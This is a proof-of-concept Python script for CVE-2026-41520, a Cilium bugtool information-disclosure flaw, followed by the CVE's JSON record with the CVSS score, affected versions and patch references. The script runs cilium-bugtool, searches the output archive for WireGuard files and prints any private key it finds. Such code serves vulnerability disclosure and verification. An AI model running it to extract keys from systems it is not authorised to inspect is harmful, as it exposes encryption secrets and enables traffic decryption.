CVE-2026-41520

#!/usr/bin/env python3 # PoC for CVE-2026-41520: Cilium bugtool information disclosure # This script demonstrates how sensitive WireGuard keys might be exposed in the bugtool archive. import os import subprocess import tarfile import tempfile def check_cilium_bugtool_leak(): print("[*] Attempting to run cilium-bugtool to simulate diagnostic collection...") # Note: This requires permissions to run cilium-bugtool (usually root or kube-system access) try: # Run the bugtool command (simulation) # In a real scenario, this would be: subprocess.run(["cilium-bugtool"], check=True) result = subprocess.run(["cilium-bugtool"], capture_output=True, text=True, timeout=60) print(f"[+] Tool executed: {result.stdout}") # Assuming the tool outputs a tar.gz file, usually named like cilium-bugtool-<timestamp>.tar.gz # We look for the latest file in the current directory or output dir files = sorted([f for f in os.listdir('.') if f.startswith('cilium-bugtool') and f.endswith('.tar.gz')]) if not files: print("[-] No bugtool archive found.") return archive_path = files[-1] print(f"[*] Analyzing archive: {archive_path}") with tarfile.open(archive_path, 'r:gz') as tar: members = tar.getnames() # Search for WireGuard configuration files or keys sensitive_files = [m for m in members if 'wireguard' in m.lower() or 'wg' in m.lower() or 'privatekey' in m.lower()] if sensitive_files: print(f"[!] Potential sensitive files found in archive: {sensitive_files}") for file_name in sensitive_files: print(f"[+] Extracting content of {file_name} for verification...") extracted_file = tar.extractfile(file_name) if extracted_file: content = extracted_file.read().decode('utf-8', errors='ignore') # Check for private key pattern (WireGuard keys are usually base64 strings) if 'PrivateKey' in content: print(f"[!!!] CRITICAL: WireGuard PrivateKey found in {file_name}") print(f"Content snippet: {content[:200]}...") else: print("[-] No obvious WireGuard files found in this specific run (might depend on config).") except FileNotFoundError: print("[-] cilium-bugtool not found on this system.") except PermissionError: print("[-] Permission denied. High privileges (PR:H) required to run this tool.") except Exception as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": check_cilium_bugtool_leak()

{"cve": {"id": "CVE-2026-41520", "sourceIdentifier": "[email protected]", "published": "2026-05-08T23:16:35.597", "lastModified": "2026-05-08T23:16:35.597", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cilium is a networking, observability, and security solution with an eBPF-based dataplane. Prior to versions 1.17.15, 1.18.9, and 1.19.3, the output of cilium-bugtool can contain sensitive data when the tool is run against Cilium deployments with WireGuard encryption enabled. This issue has been patched in versions 1.17.15, 1.18.9, and 1.19.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N", "baseScore": 7.9, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.5, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-312"}]}], "references": [{"url": "https://github.com/cilium/cilium/releases/tag/v1.17.15", "source": "[email protected]"}, {"url": "https://github.com/cilium/cilium/releases/tag/v1.18.9", "source": "[email protected]"}, {"url": "https://github.com/cilium/cilium/releases/tag/v1.19.3", "source": "[email protected]"}, {"url": "https://github.com/cilium/cilium/security/advisories/GHSA-gj49-89wh-h4gj", "source": "[email protected]"}]}}